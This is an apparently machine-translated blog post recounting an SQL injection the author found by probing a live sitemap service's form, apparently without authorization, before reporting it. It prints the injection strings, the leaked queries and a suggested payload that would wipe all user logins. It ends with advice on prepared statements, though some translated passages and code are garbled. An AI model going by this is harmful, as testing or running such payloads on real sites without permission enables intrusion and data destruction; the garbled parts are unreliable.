History of a single SQL injection

Good afternoon!
I want to tell how I hacked into a large American site for creating sitemaps and remind about protection against sql injections. The purpose of the post is for informational purposes only. But all in order.

Background

For a number of my projects, I needed to generate a couple of sitemaps. I googled and, among other things, found one American service for creating sitemaps (where you had to register). I quickly entered the left information (in the hope that the site does not have email authentication) and the site address for creating the sitemap. And he continued to engage in more important matters, forgetting for a couple of days about it.

First steps

And here I am again returning to the creation of the sitemap. I enter my data on the same site (already authentic), and the previously entered site address. As a result of processing the form, the site displays the text:
FATAL ERROR: Duplicate entry 'http://gnum.me/' for key 2 FATAL ERROR: query: 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://gnum.me/', 'fsga6a59.txt', '1','1','0','0','0', NOW());

The text means that this site is already in the database. I had an idea why not practice the implementation of sql code in order to make the Internet safer to train your hacker skill .
To begin with, I looked at the lack of verification of the text entered in the registration form for ,, cleanliness, "with this query:
', 'fsga6a59.txt', '1','1','0','0','0', NOW());
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/


The point is that I am closing the first part of the request:
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, '

Code:
', 'fsga6a59.txt', '1','1','0','0','0', NOW());

And close the terminal box
', 'fsga6a59.txt', '1','1','0','0','0', NOW());

Code:
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/


Request Result:

FATAL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useup' at line 1 FATAL ERROR: query: 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178959, '', 'fsga6a59.txt', '1','1','0','0','0', NOW()); 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW());


Result analysis

I received the information:

  1. the text I entered has no verification for malicious code;
  2. the creators of the site have limited the length (up to 125 characters), so the request until:

load, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW())

passes normally.

Summary

In principle, everything is clear further, I can enter any code up to 125 characters in this line. Next is the question of fantasy, for example:
', 'fsga6a59.txt', '1','1','0','0','0', NOW());
 UPDATE uses SET login=' ' 

By removing this request, all logins of people.

I sent information about the hole to the site. The task is completed - now our information will be more secure.

Do not forget to check the validity of the text entered by the client.

UPD1:
Tip for using the correct connections and SQL queries from imater and FanatPHP
Connect:
$dsn  = "mysql:dbname=$config[dbname]=;host=$config[host];charset=$config[charset]";
$conf = array(
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
);
$pdo = new PDO($dsn, $config["user"], $config["pass"], $conf);


Process input text:
$query = $db2->prepare("SELECT * FROM tree WHERE text LIKE :title OR id = :id");
$query->execute(array(":title"=>"%валент24938239823908%", ":id"=>$_GET ['sync3']));
while ($sql = $query->fetch()) echo $sql['fio'];


UPD2: Thanks to the comments of zerkms , I want to remind you of prepared statements :
Using prepared statements provides many benefits for both security and performance. Prepared statements can help improve security by separating the logic of the SQL query from the data substituted into it. This separation of logic and data can help prevent the introduction of SQL injection. Usually, when you use queries that use data from users, you have to be very careful. To do this, you use functions that escape problem characters, such as single and double quotes, backslash. These operations are not necessary when you use prepared statements. Separating the data from the SQL query logic allows MySQL to automatically process these characters and not resort to special functions.

Thank you for your attention. Do not judge strictly my first post.

Also popular now: